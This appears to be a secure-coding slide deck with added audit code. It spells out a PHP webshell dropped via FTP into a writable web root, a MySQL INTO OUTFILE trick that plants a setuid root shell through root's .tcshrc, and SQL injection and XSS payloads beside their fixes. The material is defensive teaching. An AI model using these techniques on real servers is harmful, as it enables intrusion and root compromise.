cell phones • bio-facilities • Sodas, junk food, and coffee • Welcome to the No Smoking State
who are you? • where are you from? • what do you do? • Emacs or vi?
Warm Fuzzies • Secure Design and Implementation • Wordage
Security Concepts • Vetting Software • Design Strategy • Developer practices • Coding Practices • Operational Practices
trust • transitive trust
principle of least privilege • enumerating badness • “best block: not be there” • -- Mr. Miyagi
threats • vulnerabilities • risks
confidentiality • integrity • availability
protect what you can • detect what you can’t prevent
a security mechanism is designed to protect against a specific, finite set of attacks. • It usually fails gloriously when modified or used for other purposes.
don’t rely on the environment for protection • don’t rely on good behavior • don’t rely on things you can’t control
ftproot == wwwroot (FTP uploads land in the web tree) • webuser == o+w (the web tree is world-writable)
upload a one-line php script via ftp • <? passthru($cmd); ?> ($cmd populated from the query string, register_globals style) • upload the backdoor source (httpd.c) the same way • compile and execute it via http • http://www.apache.org/thatdir/wuh.php3?cmd=gcc+-o+httpd+httpd.c • voilà! shell on the web server, running as the web user
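The chain above only works because two settings coincide: the FTP root is the web root (or sits inside it) and a directory there is world-writable, so anything uploaded is served and, if it ends in .php/.php3, executed. The audit below is an added example, not code from the deck: it walks a web root for other-writable directories and for PHP-style scripts sitting in them, and checks whether the two roots overlap. The tree it builds (`www/thatdir/wuh.php3`) is constructed in a temp directory for the demo.

```python
"""Audit a web root for the FTP-upload / webshell misconfiguration:
a web root (or a directory under it) that is writable by others and that
the web server will hand to the PHP interpreter.  Added example, not from
the original deck; the paths and file names are constructed."""
import os
import stat
import tempfile

# Extensions a web server of that era would execute as PHP.
SCRIPT_EXTS = (".php", ".php3", ".php4", ".phtml")


def same_tree(ftproot, wwwroot):
    """True if one root is the other or lies inside it (ftproot == wwwroot)."""
    a = os.path.realpath(ftproot)
    b = os.path.realpath(wwwroot)
    return os.path.commonpath([a, b]) in (a, b)


def other_writable_dirs(root):
    """Directories under root with the o+w bit set: anyone may drop files."""
    hits = []
    for dirpath, _, _ in os.walk(root):
        if os.lstat(dirpath).st_mode & stat.S_IWOTH:
            hits.append(os.path.relpath(dirpath, root))
    return sorted(hits)


def scripts_in_writable_dirs(root):
    """Scripts the server will run that sit in an o+w directory: a file
    anyone can write and the server will execute is a shell for the taking."""
    hits = []
    for dirpath, _, filenames in os.walk(root):
        if not os.lstat(dirpath).st_mode & stat.S_IWOTH:
            continue
        for name in filenames:
            if name.lower().endswith(SCRIPT_EXTS):
                hits.append(os.path.relpath(os.path.join(dirpath, name), root))
    return sorted(hits)


def audit(ftproot, wwwroot):
    """Collect the three findings; any non-empty / True entry is a problem."""
    return {
        "ftproot_in_wwwroot": same_tree(ftproot, wwwroot),
        "writable_dirs": other_writable_dirs(wwwroot),
        "scripts_in_writable_dirs": scripts_in_writable_dirs(wwwroot),
    }


def demo():
    """Build a constructed, deliberately misconfigured tree in a temp dir
    (the layout from the slide) and audit it."""
    base = tempfile.mkdtemp()
    www = os.path.join(base, "www")
    upload = os.path.join(www, "thatdir")
    os.makedirs(upload)
    os.chmod(www, 0o755)
    os.chmod(upload, 0o777)                  # the o+w the deck warns about
    with open(os.path.join(upload, "wuh.php3"), "w") as f:
        f.write("<? passthru($cmd); ?>\n")   # the deck's one-line webshell
    with open(os.path.join(www, "index.html"), "w") as f:
        f.write("<html></html>\n")
    return audit(ftproot=www, wwwroot=www)   # ftproot == wwwroot


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The fix is the inverse of each finding: give FTP its own tree outside the document root, keep upload directories out of the web server's interpreter mappings, and never leave o+w on anything the server serves.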
bugzilla talking to mysql • mysql running as root • mysql username/password stored in a script
create a table with a text field • insert the lines of a shell script: • #!/bin/sh • cp /bin/sh /tmp/.rootsh • chmod 4755 /tmp/.rootsh • rm -f /root/.tcshrc • query: SELECT ... INTO OUTFILE '/root/.tcshrc' • wait for someone to “su -” (root’s login shell sources .tcshrc, builds the setuid shell, and removes the evidence)
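Each link in that chain is a condition an administrator can check for: mysqld running as root, the application account holding the FILE privilege (which is what SELECT ... INTO OUTFILE requires), no secure_file_priv restriction (a MySQL 5.1.17+ setting, so later than the deck), and the password sitting on a command line in a script. The checks below are an added example, not code from the deck; the ps, SHOW GRANTS and script text they parse are constructed, not captured from a real host.

```python
"""Checks for the conditions the Bugzilla/MySQL slides chain together.
Added example, not from the original deck; all sample outputs are constructed."""
import re

# Constructed: what `ps -eo user,comm` might show on the misconfigured host.
PS_OUTPUT = """USER     COMMAND
root     init
root     mysqld
nobody   httpd
"""

# Constructed: output of SHOW GRANTS FOR 'bugs'@'localhost'.
GRANTS_OUTPUT = """GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, FILE ON *.* TO 'bugs'@'localhost'
GRANT ALL PRIVILEGES ON `bugs`.* TO 'bugs'@'localhost'
"""

# Constructed: a maintenance script with the password on the command line.
SCRIPT = """#!/bin/sh
mysql -u bugs -ps3cret bugs < nightly.sql
"""


def mysqld_runs_as_root(ps_output):
    """Skip the header, then look for a mysqld process owned by root."""
    for line in ps_output.splitlines()[1:]:
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "root" and parts[1] == "mysqld":
            return True
    return False


def has_file_privilege(grants_output):
    """FILE is a global privilege: it only counts when granted ON *.*."""
    for line in grants_output.splitlines():
        m = re.match(r"GRANT (.+?) ON \*\.\* TO", line)
        if not m:
            continue
        privs = {p.strip().upper() for p in m.group(1).split(",")}
        if "FILE" in privs or "ALL PRIVILEGES" in privs:
            return True
    return False


def secure_file_priv_restricts(value):
    """'' means INTO OUTFILE may write anywhere mysqld can; 'NULL' disables
    import/export entirely; a path confines it to that directory."""
    return value.strip() != ""


def password_in_script(script_text):
    """Catches `-pSECRET` and `--password=SECRET`, both visible in `ps`."""
    return re.search(r"(^|\s)(-p\S+|--password=\S+)", script_text) is not None


def findings(ps_output, grants_output, secure_file_priv, script_text):
    """Return one line per condition that holds; an empty list is the goal."""
    issues = []
    if mysqld_runs_as_root(ps_output):
        issues.append("mysqld runs as root: INTO OUTFILE can write into /root")
    if has_file_privilege(grants_output):
        issues.append("application account holds FILE: can SELECT ... INTO OUTFILE")
    if not secure_file_priv_restricts(secure_file_priv):
        issues.append("secure_file_priv is empty: OUTFILE path is unrestricted")
    if password_in_script(script_text):
        issues.append("database password embedded in script and visible in ps")
    return issues


if __name__ == "__main__":
    for issue in findings(PS_OUTPUT, GRANTS_OUTPUT, "", SCRIPT):
        print("FAIL:", issue)
```

The corresponding fixes are to start mysqld with `--user=mysql` (or `user=mysql` in my.cnf), grant the application account only the per-database privileges it needs and never FILE, set secure_file_priv, and move credentials into a mode-0600 option file read with `--defaults-extra-file` instead of the command line.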
What is it supposed to do? • How does it work? • What side effects are there? • How is it deployed and maintained?
How does it fail? • What is the risk? • Can it be mitigated?
understanding • caring • under-budget
It is especially important for expert programmers to internalize this habit, for two reasons. One is that expert programmers are disproportionately drawn from the high end of the bell curve in their working-set size; therefore they tend to systematically overestimate the amount of complexity other people can handle easily. • -- Eric S. Raymond, The Art of Unix Usability
goals • requirements • design • review
what is the end result? • what problem is it trying to solve? • *not* how it is implemented
security • usability • performance • environmental
support • deployment • political • external
as simple as possible to meet the requirements • add requirements if apparent during design • be prepared to change when requirements can’t be met
for each security control • what threat is addressed? • Really?
The three virtues of a programmer are laziness, impatience, and hubris. • -- Larry Wall
Group permissions and accounts • Code Safety • Test Environment • Regression Testing
bounds checking • input validation • no client-side trust • error checking
sql injection • cross-site scripting • credential handling • data mapping • logging
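Three of the coding-practice bullets above (input validation and bounds checking, sql injection, cross-site scripting) share one root cause: data from the client is allowed to become part of the program's grammar. The code below is an added example, not from the deck: each check is shown in its vulnerable form beside the hardened one, using an in-memory SQLite table and constructed attacker inputs; the table layout and the page-size parameter are assumptions for the demo.

```python
"""Vulnerable and hardened versions of three coding-practice checks.
Added example, not from the original deck; the users table, the
attacker inputs and the page-size parameter are constructed."""
import html
import re
import sqlite3


def make_db():
    """Constructed login table, in memory, so the demo runs offline."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [("alice", "correct horse", "admin"),
                    ("bob", "hunter2", "user")])
    return db


# --- sql injection -----------------------------------------------------
def login_vulnerable(db, user, password):
    """Query built by string formatting: the client writes part of the SQL.
    password = "' OR '1'='1" turns the WHERE clause into 'anything OR true'."""
    sql = ("SELECT role FROM users WHERE name = '%s' AND password = '%s'"
           % (user, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(db, user, password):
    """Placeholders keep the data out of the SQL grammar; a quote is just a byte."""
    row = db.execute(
        "SELECT role FROM users WHERE name = ? AND password = ?",
        (user, password)).fetchone()
    return row[0] if row else None


# --- cross-site scripting ----------------------------------------------
def render_greeting_vulnerable(name):
    """User text dropped straight into markup: the client writes HTML."""
    return "<p>Hello, %s</p>" % name


def render_greeting_escaped(name):
    """Escape on output so <, >, &, quotes are text, not tags or attributes."""
    return "<p>Hello, %s</p>" % html.escape(name, quote=True)


# --- input validation / bounds checking --------------------------------
def parse_page_size(raw, lo=1, hi=100):
    """Fail closed: a strict digit pattern first (Python's int() would accept
    ' 25' and '2_5'), then a range check; the client's value is never trusted."""
    if not isinstance(raw, str) or not re.fullmatch(r"[0-9]{1,3}", raw):
        raise ValueError("page size must be 1-3 digits")
    n = int(raw, 10)
    if not lo <= n <= hi:
        raise ValueError("page size out of range")
    return n


if __name__ == "__main__":
    db = make_db()
    evil = "' OR '1'='1"
    print("vulnerable login:   ", login_vulnerable(db, "nobody", evil))
    print("parameterized login:", login_parameterized(db, "nobody", evil))
    print(render_greeting_vulnerable("<script>alert(1)</script>"))
    print(render_greeting_escaped("<script>alert(1)</script>"))
    print(parse_page_size("25"))
```

The same rule covers the other bullets on the slide: credentials and log lines are data too, so they are validated on the way in, handled by a dedicated routine rather than ad hoc string code, and escaped or parameterized on the way out.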
Server accounts and permissions • handling credentials • accountability • software maintenance • documentation • testing and debugging